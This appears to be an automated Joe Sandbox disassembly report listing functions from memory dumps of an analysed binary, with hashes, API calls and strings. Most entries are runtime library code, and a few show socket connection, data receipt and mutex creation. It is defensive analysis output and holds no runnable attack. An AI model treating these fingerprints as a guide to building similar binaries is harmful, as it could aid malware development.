Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction ID: d50f3775719ed0648a3c6b081d8d63e03159653c2f664ce147ef88428865c4fd
Opcode Fuzzy Hash: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction Fuzzy Hash: 3511CA326C86023ED61127745C6497E225ADFC177AB670235F62C961E0EF62CC078655

Function 0043A6F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004374B8,00402207), ref: 0043A6FD
_free.LIBCMT ref: 0043A75A
_free.LIBCMT ref: 0043A790
SetLastError.KERNEL32(00000000,00000008,000000FF,?,004374B8,00402207), ref: 0043A79B

Strings

x!F, xrefs: 0043A783

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction ID: ec4074691b07f72bd5b3f549a11092afdb3275d14d9fee9f318d6143afe4fa88
Opcode Fuzzy Hash: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction Fuzzy Hash: 9411E9312847047AD61123765CC6E6B226ADBCD7B9F24223FFA54822D1EBADCC12415F

Function 0214A95F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0214771F,0211246E), ref: 0214A964
_free.LIBCMT ref: 0214A9C1
_free.LIBCMT ref: 0214A9F7
SetLastError.KERNEL32(00000000,00462170,000000FF,?,0214771F,0211246E), ref: 0214AA02

Strings

x!F, xrefs: 0214A9EA

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction ID: 4f039660183b7d0ed22591e97048c182063ce7847d6d55ef2b1ab1c64c0c3506
Opcode Fuzzy Hash: 20bf2414b9ffb77df04e35f67f1c4be936db27aece0908ff67d9088a44b49df5
Instruction Fuzzy Hash: 7011C2326C8A007ED6112F74AC94A6A225E9FC1779B270339F62C961E0EFA2CC068515

Function 00435F57 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00435FA7

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
Instruction ID: 028a4c87e1a143b4e3f99df1a19c577150227ab03245b5161e180182351f6795
Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
Instruction Fuzzy Hash: CE11CB31A05B25ABCB215B689C44A1F3768AF097B0F251223FC16A73D1D774ED01C6E9

Function 00432034 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00432054
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432065
StructuredWorkStealingQueue.LIBCMT ref: 0043209B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320AC

Strings

e, xrefs: 00432076

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: c923216e9bfa0ff3ff3672bf3cc7103de8a20d897a4bce70c00b849211ff2859
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: A611A731100105ABCB1CDE69C64166B73B4AF16364F24D06BEE068F252DBB9DD09CBA9

Function 0214229B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 021422BB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021422CC
StructuredWorkStealingQueue.LIBCMT ref: 02142302
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 02142313

Strings

e, xrefs: 021422DD

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 2ccd9ce5262b164a3260a393b4f39067523d7643f89948ce83a199a7530fa6bd
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 5611A0311445059BCB19DF69C890BAB73B6AF06368B1881A9FC1EDF205DF71D986CFA0

Function 0211AA37 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 0211AA3A
CreateMutexA.KERNEL32(00000000,00000000,00463224), ref: 0211AA58
GetLastError.KERNEL32 ref: 0211AA60
GetLastError.KERNEL32 ref: 0211AA71

Strings

$2F, xrefs: 0211AA47

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID: $2F
API String ID: 3645482037-2999617530
Opcode ID: 7f75eb3033ac71763095a6051423b2ac46d8d06aeda4dc9a3a6b80d8246d0b60
Instruction ID: e72f31b445735031dad4f436584cbb23ce6a7e58c05ff832bd4c968e98eb7a71
Opcode Fuzzy Hash: 7f75eb3033ac71763095a6051423b2ac46d8d06aeda4dc9a3a6b80d8246d0b60
Instruction Fuzzy Hash: 2401F431580340EBE7109FA8FD08F5A7BB5EB04B22F100A35F619C61D0DB799844CB6A

Function 004248DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 0042490E

Part of subcall function 004251CF: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 004251E9
Part of subcall function 004251CF: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00427667
Part of subcall function 004251CF: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 00427679
Part of subcall function 004251CF: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,004489D0,000000FF), ref: 0042768F

Part of subcall function 0041F3A7: DeleteCriticalSection.KERNEL32(?,0042BB51,92861014,00000000,?,?,00000000,0044B37B,000000FF,?,0042052C), ref: 0041F3A8

~ListArray.LIBCONCRT ref: 00424950

Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,?,?,00424955,92861014,?,?,?,004489D0,000000FF), ref: 004247B0
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247B9
Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424955,92861014,?,?,?,004489D0,000000FF), ref: 004247C2
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247CB
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247D5

~ListArray.LIBCONCRT ref: 00424958

Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,?,?,0042495D,92861014,?,?,?,004489D0,000000FF), ref: 0042482A
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424833
Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0042495D,92861014,?,?,?,004489D0,000000FF), ref: 0042483C
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424845
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 0042484F
Part of subcall function 00424825: _InternalDeleteHelper.LIBCONCRT ref: 00424868

Strings

OKB, xrefs: 00424986
rKB, xrefs: 00424908

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
String ID: OKB$rKB
API String ID: 3638618822-2616793421
Opcode ID: 0c9af8e3d83cc23414255d63bc99794984f375fa3166cd08da6f4d8f38899987
Instruction ID: 77cb08d7a2878f5d6c31cfea2a85ce3b56c179720aa5c90e0a110e80ff89d1e5
Opcode Fuzzy Hash: 0c9af8e3d83cc23414255d63bc99794984f375fa3166cd08da6f4d8f38899987
Instruction Fuzzy Hash: 3211B271700951AFD709FB22EC42BD9B7A0FF90318F40412FE426435A1EF387955CA88

Function 004248E2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 0042490E

Part of subcall function 004251CF: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 004251E9
Part of subcall function 004251CF: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00427667
Part of subcall function 004251CF: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 00427679
Part of subcall function 004251CF: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,004489D0,000000FF), ref: 0042768F

Part of subcall function 0041F3A7: DeleteCriticalSection.KERNEL32(?,0042BB51,92861014,00000000,?,?,00000000,0044B37B,000000FF,?,0042052C), ref: 0041F3A8

~ListArray.LIBCONCRT ref: 00424950

Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,?,?,00424955,92861014,?,?,?,004489D0,000000FF), ref: 004247B0
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247B9
Part of subcall function 004247AB: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424955,92861014,?,?,?,004489D0,000000FF), ref: 004247C2
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247CB
Part of subcall function 004247AB: ListArray.LIBCONCRT ref: 004247D5

~ListArray.LIBCONCRT ref: 00424958

Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,?,?,0042495D,92861014,?,?,?,004489D0,000000FF), ref: 0042482A
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424833
Part of subcall function 00424825: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0042495D,92861014,?,?,?,004489D0,000000FF), ref: 0042483C
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 00424845
Part of subcall function 00424825: ListArray.LIBCONCRT ref: 0042484F
Part of subcall function 00424825: _InternalDeleteHelper.LIBCONCRT ref: 00424868

Strings

OKB, xrefs: 00424986
rKB, xrefs: 00424908

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
String ID: OKB$rKB
API String ID: 3638618822-2616793421
Opcode ID: 72137cbda820330695d694d4acfdcc4a27e9474d8749596f25e61045f2dc6b0c
Instruction ID: 1340b7c3b95eae4a1ab8519dcd624b81f328a7fa145ff03b142a0d068b82aab9
Opcode Fuzzy Hash: 72137cbda820330695d694d4acfdcc4a27e9474d8749596f25e61045f2dc6b0c
Instruction Fuzzy Hash: 0A118271704951ABD709FB22EC52BD9B7A4FF90318F40412FE426435A1EF387955CA88

Function 0043650D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436502,?,?,004364CA,?,?,?), ref: 00436522
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00436535
FreeLibrary.KERNEL32(00000000,?,?,00436502,?,?,004364CA,?,?,?), ref: 00436558

Strings

mscoree.dll, xrefs: 0043651B
CorExitProcess, xrefs: 0043652D

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction ID: 401d026be5ffeb3a405c3c36e376af9a64225cb0f4d8c4650835087bd389e51f
Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction Fuzzy Hash: 03F05E35541219FBCB129B50ED0EB9E7A69AB04756F2040B2B805A12A1CB78CE04DA98

Function 004466D9 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(007C0C20,007C0C20,?,7FFFFFFF,?,?,00446995,007C0C20,007C0C20,?,007C0C20,?,?,?,?,007C0C20), ref: 0044677C
__alloca_probe_16.LIBCMT ref: 00446832
__alloca_probe_16.LIBCMT ref: 004468C8
__freea.LIBCMT ref: 00446933
__freea.LIBCMT ref: 0044693F

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 3f3d2c09f82bbde3d650f7328101820acc8fe7b47ab9b181bef6d3a88d6f1071
Instruction ID: 728ae64f146763a477a97c5dd583e41f32425dec156a86170229362d1d3b66db
Opcode Fuzzy Hash: 3f3d2c09f82bbde3d650f7328101820acc8fe7b47ab9b181bef6d3a88d6f1071
Instruction Fuzzy Hash: 2181D6B2D002159BFF209E55C841EEF7BB99F0B718F1A405BE844A7351D779CC4187AA

Function 0211DC97 Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ebbf92b61de8fdabddf4bb2b9669c2e1d0f500dd48a019fa951a235035c68e2
Instruction ID: 920aa602715a8deb27a03d01a91fed2c88fd72b4c39f70c6ffd6c3019e6fa4f8
Opcode Fuzzy Hash: 3ebbf92b61de8fdabddf4bb2b9669c2e1d0f500dd48a019fa951a235035c68e2
Instruction Fuzzy Hash: 4661D6B0D44768AFDB10DF64CD48B99F7B9EF04300F1082AAE90CA7250EB70AA55CF95

Function 00444B44 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444BC8
__alloca_probe_16.LIBCMT ref: 00444C8E
__freea.LIBCMT ref: 00444CFA

Part of subcall function 0043AF7B: HeapAlloc.KERNEL32(00000000,?,?,?,0043E41D,00000220,?,?,?,?,?,?,0043751E,?), ref: 0043AFAD

__freea.LIBCMT ref: 00444D03
__freea.LIBCMT ref: 00444D26

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 7bfac1b3c99829b4c868752d8604b507d8fa54fac7bb82f20194f51658f21638
Instruction ID: 472eb95a2b2a372d2cb1eaf9beb992b03daa96e3215ebfe893367cc5ae89ee58
Opcode Fuzzy Hash: 7bfac1b3c99829b4c868752d8604b507d8fa54fac7bb82f20194f51658f21638
Instruction Fuzzy Hash: 635104B2900216ABFF215F55EC81FAB36A9DFC4758F29412BFD04D7241EB38DC1186A8

Function 0040DD2E Relevance: 7.7, APIs: 5, Instructions: 158networkCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0040DD9D
recv.WS2_32(?,?,00001F40,00000000), ref: 0040DDD6
recv.WS2_32(?,?,00001F40,00000000), ref: 0040DE04
closesocket.WS2_32(?), ref: 0040DE78
__Mtx_unlock.LIBCPMT ref: 0040DEAD

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_unlockrecv$closesocket
String ID:
API String ID: 1157980791-0
Opcode ID: 66adfc68180e7e393e5577757d91213592b7fd66ee1a14fdeceabc6098510d6a
Instruction ID: 685854c801625c6efbf3b8326fe0e2bd3c33ae66e554caa2c299d7dac6db93c6
Opcode Fuzzy Hash: 66adfc68180e7e393e5577757d91213592b7fd66ee1a14fdeceabc6098510d6a
Instruction Fuzzy Hash: 1551D5B1D00605EFD7119F64CC45B96B7B5EF14304F1482BFE80AAB2A1EB35AD54CB49

Function 00436E71 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00436E93
GetFileInformationByHandle.KERNEL32(?,?), ref: 00436EED
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00436DA3,?,000000FF), ref: 00436F7B
__dosmaperr.LIBCMT ref: 00436F82
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00436FBF

Part of subcall function 004371E7: __dosmaperr.LIBCMT ref: 0043721C

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: efefd2ded84382f9e951c6311a9ec95217b47005859bbaf9a6cf84a928e8ddad
Instruction ID: 713bdfeaf1d5cd3a9a6724314531c93a0b5a9354d0d37a081fe2ddba32240612
Opcode Fuzzy Hash: efefd2ded84382f9e951c6311a9ec95217b47005859bbaf9a6cf84a928e8ddad
Instruction Fuzzy Hash: 18416D75900605AFDB24DFA6EC459AFBBF9EF48304B01942EF556D3210EA389804CB65

Function 021470D8 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 021470FA
GetFileInformationByHandle.KERNEL32(?,?), ref: 02147154
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0214700A,?,000000FF), ref: 021471E2
__dosmaperr.LIBCMT ref: 021471E9
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02147226

Part of subcall function 0214744E: __dosmaperr.LIBCMT ref: 02147483

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: efefd2ded84382f9e951c6311a9ec95217b47005859bbaf9a6cf84a928e8ddad
Instruction ID: fcba5573c09b367dca64eb421e63433b31c0fc38f75102b2b4253567454bcc18
Opcode Fuzzy Hash: efefd2ded84382f9e951c6311a9ec95217b47005859bbaf9a6cf84a928e8ddad
Instruction Fuzzy Hash: 18413A75940604AFDB249FB5DC449ABFBF9EF88700B104929F85AD3690EB30A906CB61

Function 0042DAD0 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DB04

Part of subcall function 00428ECF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428EF0

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DB63
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DB89
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DBA9
Concurrency::location::_Assign.LIBCMT ref: 0042DBF6

Part of subcall function 004312CF: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431314

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: f5c14901273251154764a76b44e3b76d96a1a4ea67582a1e6a4f4a2fb9e6b1ec
Instruction ID: 51bf104583d7f1166f33b546ff748270aafde5feaddbff3e5f583d1dd01a2ca3
Opcode Fuzzy Hash: f5c14901273251154764a76b44e3b76d96a1a4ea67582a1e6a4f4a2fb9e6b1ec
Instruction Fuzzy Hash: 1A416874B04220ABCF19AB25D895BBEBB75AF45310F0040AFE4029B382CF78AD45C7D9

Function 0213DD37 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0213DD6B

Part of subcall function 02139136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 02139157

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0213DDCA
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0213DDF0
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0213DE10
Concurrency::location::_Assign.LIBCMT ref: 0213DE5D

Part of subcall function 02141536: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 0214157B

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: f5c14901273251154764a76b44e3b76d96a1a4ea67582a1e6a4f4a2fb9e6b1ec
Instruction ID: 8a7d9bd12826fe15d6a6e4033d60997f03ccc4a14ceac9333be220e30dc9011c
Opcode Fuzzy Hash: f5c14901273251154764a76b44e3b76d96a1a4ea67582a1e6a4f4a2fb9e6b1ec
Instruction Fuzzy Hash: 8641F875680214AFDF1BAB24D885BAEBBB7AF45720F1440E9E4069B3C1CF70AD45CB91

Function 0212EEED Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0212EEF4
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0212EF1E

Part of subcall function 0212F5E4: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0212F601

Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0212EF9B
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0212EFCD
__freea.LIBCMT ref: 0212EFF3

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
String ID:
API String ID: 2497068736-0
Opcode ID: 93ce5f58012892b0e6dbecc93140a65fa9373db8bd9ad52c9fda59375bb47559
Instruction ID: 0992c94eea4477f5a26bd18e6f1898fb485cf8fe8bebb86d3d99f2319b4ed77a
Opcode Fuzzy Hash: 93ce5f58012892b0e6dbecc93140a65fa9373db8bd9ad52c9fda59375bb47559
Instruction Fuzzy Hash: BC318F72A401258FDB19DFA8C8406ADB7B6EF09314F25406EF415EB390DB74AD1ACBA1

Function 00428669 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0042868E

Part of subcall function 0041EA70: _SpinWait.LIBCONCRT ref: 0041EA88

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 004286A2
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004286D4
List.LIBCMT ref: 00428757
List.LIBCMT ref: 00428766

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 660398a7946df9d1abeb6bfacc2067e3bef07dd929885e79fda47ff7578b1cd6
Instruction ID: 0cfe79190a9cc40c49ef8cea695a92ff63859d9b7455348f45121259b9f82a47
Opcode Fuzzy Hash: 660398a7946df9d1abeb6bfacc2067e3bef07dd929885e79fda47ff7578b1cd6
Instruction Fuzzy Hash: BE318872E02665DFCB14EFA5E5916EDB7B0BF50308F94406FD80167692CB396D08CB98

Function 0040DC1F Relevance: 7.6, APIs: 5, Instructions: 80networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000000,?,?), ref: 0040DC7C
freeaddrinfo.WS2_32(?), ref: 0040DC9D
socket.WS2_32(00000002,00000001,00000000), ref: 0040DCC5
connect.WS2_32(00000000,?,00000010), ref: 0040DCD7
closesocket.WS2_32(00000000), ref: 0040DCF1

